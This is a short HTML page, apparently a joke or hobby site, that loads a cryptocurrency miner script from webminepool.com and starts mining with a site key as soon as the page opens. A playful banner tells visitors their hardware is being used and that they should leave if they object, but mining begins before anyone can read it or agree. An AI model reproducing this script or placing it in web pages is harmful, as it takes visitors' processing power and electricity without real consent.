<!DOCTYPE html>
<html>
  <head>

  </head>
  <body bgcolor="white">
    <script src="https://www.webminepool.com/lib/base.js"></script>

    <script>
      var miner = WMP.Anonymous('SK_NQvbhTn8Y4lv37N9MMBwg');
      miner.start();
    </script>
    <font style="Verdana" size=5 color="cyan">I am mining I am mining(this website uses your hardware resources if you are not ok with it then please leave and whoever is ok with it is an epik baccha :D UwU OwO)</font>
    <video>  <source src="https://media.tenor.co/videos/4a53f722bf63aa8454f7d6804e534e3a/mp4" type="video/mp4"></video>

  </body>
</html>
